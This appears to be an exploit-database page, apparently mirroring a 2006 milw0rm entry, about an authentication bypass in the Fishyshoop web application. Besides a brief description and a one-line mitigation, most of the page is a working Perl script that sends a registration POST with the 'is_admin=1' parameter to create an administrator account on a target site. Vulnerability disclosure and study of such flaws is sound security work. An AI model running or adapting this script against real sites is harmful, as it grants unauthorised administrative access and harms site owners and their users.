header-logo
Suggest Exploit
vendor:
Fishyshoop
by:
James Gray
7,5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Fishyshoop
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Fishyshoop Security Vulnerability

This exploit allows an attacker to bypass authentication and register as an admin on Fishyshoop, a web application. The exploit uses the WWW::Curl::Easy Perl module to send a POST request to the Fishyshoop root URL with the desired username and password, and the is_admin parameter set to 1. This allows the attacker to register as an admin without any authentication.

Mitigation:

Ensure that authentication is properly implemented and that the is_admin parameter is not vulnerable to manipulation.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# James Gray <james6.0[@]gmail.com>
# Fishyshoop Security Vulnerability

use WWW::Curl::Easy;

sub usage() {
 print "$0 <Fishyshoop root URL> <Desired E-Mail> <Desired Password>\n";
 exit();
}

$FSURL=shift or usage(); $UNAME=shift or usage(); $PASS=shift or usage();

my $fishyshoop = new WWW::Curl::Easy;
$fishyshoop->setopt(CURLOPT_URL, "$FSURL?L=register.register");
$fishyshoop->setopt(CURLOPT_POST, 1);
$fishyshoop->setopt(CURLOPT_POSTFIELDS, "email=$UNAME&password=$PASS&is_admin=1&submit=1");
$fishyshoop->perform;

# milw0rm.com [2006-12-25]

Navigation

Suggest Exploit

Services By CQR